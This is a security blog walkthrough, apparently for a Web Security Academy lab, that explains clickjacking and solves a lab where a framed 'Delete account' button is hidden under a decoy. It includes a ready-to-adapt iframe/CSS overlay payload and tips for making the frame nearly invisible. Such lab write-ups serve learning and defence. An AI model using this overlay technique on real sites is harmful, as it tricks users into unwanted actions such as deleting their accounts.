What is Clickjacking?

The criminal practice of “clickjacking” involves tricking visitors into clicking on hidden or masked parts on a website without their knowledge. This is frequently used to drive people to unauthorized websites or carry out unauthorized deeds. It takes advantage of visitors’ confidence in a legitimate website’s outward look

Here are the rest articles about clickjacking

• Basic clickjacking with CSRF token protection
• Clickjacking with form input data prefilled from a URL parameter
• Clickjacking with a frame buster script
• Exploiting clickjacking vulnerability to trigger DOM-based XSS
• Multistep clickjacking

Introduction To Basic clickjacking with CSRF token protection

Clickjacking is a web security vulnerability where an attacker manipulates a user to click on a disguised or hidden element, leading to unintended actions. To mitigate this risk, vulnerable applications use CSRF token protection. CSRF tokens prevent unauthorized actions by requiring a unique token for each user request. Web developers can enhance protection by implementing X-Frame-Options headers and Content-Security-Policy frame-ancestors directives. Prioritizing web security, implementing CSRF token protection, and considering defensive measures can reduce the risk of clickjacking attacks, ensuring user integrity, safeguarding sensitive information, and maintaining a secure browsing experience.

Lab Solutions | Practical Work Time

This lab contains login functionality and a delete account button that is protected by a CSRF token. A user will click on elements that display the word “click” on a decoy website.

To solve the lab, craft some HTML that frames the account page and fools the user into deleting their account. The lab is solved when the account is deleted.

You can log in to your own account using the following credentials: wiener:peter

Stepwise Solution of the lab:-

After accessing this lab, we first noticed My account.

So, click on My account, and let’s see what we have to do next.

Well, it’s a login form, Right?

As following credentials: wiener:peter . We filled it now click on Log in.

We logged in and saw that it has a functionality named Delete account. We will apply our clickjacking technique into it. Now simply click on Go to exploit server.

After clicking on Go to exploit server scroll down a little bit. Now paste the below payload into the body section.

<style>
    iframe {
        position:relative;
        width:$width_value;
        height: $height_value;
        opacity: $opacity;
        z-index: 2;
    }
    div {
        position:absolute;
        top:$top_value;
        left:$side_value;
        z-index: 1;
    }
</style>
<div>Test me</div>
<iframe src="YOUR-LAB-ID.web-security-academy.net/my-account"></iframe>

First of all, let me remind you to understand the overview of this lab. You need some basic knowledge of HTML iframe tag & CSS. Now what I did is replace YOUR-LAB-ID.web-security-academy.net/my-account to my LAB link. And according to my screen, I set the width and height also the top & left. So yeah you may ask why we do this and what’s the logic of it, Right? So actually the logic is victim will never understand what will happen to him.

Click on Store and view exploit.

I positioned Claim the reward on Delete Account. Well so the victim would never understand. For more fooling the victim we can lower the opacity to 0.0001 instead of 0.1.

Now back to the exploit server and click on Deliver exploit to victim.

BOOM! We’ve solved this lab successfully.

Be ready for its other parts 🙂

So Guys as you had completed the previous topic i.e. WebSockets, now welcome to the next topic i.e. Clickjacking, Now as you have started it complete the above topic which is Basic clickjacking with CSRF token protection, after completing this topic then move to the next topic i.e. Clickjacking With Form Input Data Prefilled From A URL Parameter. Please follow us for more details & Good Luck!

Thank you for reading, if this article really helps you then do share it with your mates.
And follow @masaudsec on Twitter.